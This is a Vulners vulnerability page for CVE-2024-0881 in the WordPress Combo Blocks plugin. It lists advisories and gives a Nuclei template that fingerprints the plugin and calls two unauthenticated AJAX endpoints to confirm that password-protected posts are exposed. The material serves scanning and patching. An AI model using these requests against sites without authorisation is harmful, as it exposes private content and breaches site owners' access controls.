| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2024-0881 | 13 Apr 202402:06 | – | circl | |
| WordPress plugin Combo Blocks 安全漏洞 | 11 Apr 202400:00 | – | cnnvd | |
| CVE-2024-0881 | 11 Apr 202415:36 | – | cve | |
| CVE-2024-0881 Combo Blocks < 2.2.76 - Unauthenticated Password Protected Posts Access | 11 Apr 202415:36 | – | cvelist | |
| CVE-2024-0881 | 11 Apr 202416:15 | – | nvd | |
| CVE-2024-0881 | 11 Apr 202416:15 | – | osv | |
| WordPress Post Grid and Gutenberg Blocks Plugin < 2.2.76 is vulnerable to Broken Access Control | 15 Apr 202400:00 | – | patchstack | |
| WordPress Combo Blocks plugin < 2.2.76 - Unauthenticated Password Protected Posts Access vulnerability | 15 Apr 202411:03 | – | patchstack | |
| PT-2024-15886 · WordPress · Post Blocks +5 | 11 Apr 202400:00 | – | ptsecurity | |
| CVE-2024-0881 | 23 May 202510:30 | – | redhatcve |
id: CVE-2024-0881
info:
name: Combo Blocks < 2.2.76 - Improper Access Control
author: s4e-io
severity: medium
description: |
The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
impact: |
Unauthenticated attackers can access password-protected posts bypassing authentication restrictions, potentially exposing sensitive content.
remediation: |
Update Combo Blocks plugin to version 2.2.76 or later.
reference:
- https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0881
classification:
cve-id: CVE-2024-0881
cwe-id: CWE-284
epss-score: 0.16906
epss-percentile: 0.96677
metadata:
verified: true
max-request: 3
publicwww-query: "/wp-content/plugins/user-meta/"
tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"
matchers:
- type: word
internal: true
words:
- "User Profile Builder"
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '{"html"'
- '"<div class='
- '"pagination":'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220344dd2d0c86a5b46e78929ffdf92f5c4fec60bde7e57b937817da5e122778627022100a982377fbd2f0f13a5dfe35c35169655061ebf28f9ee3e6243f9e9d1c18ea3db:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation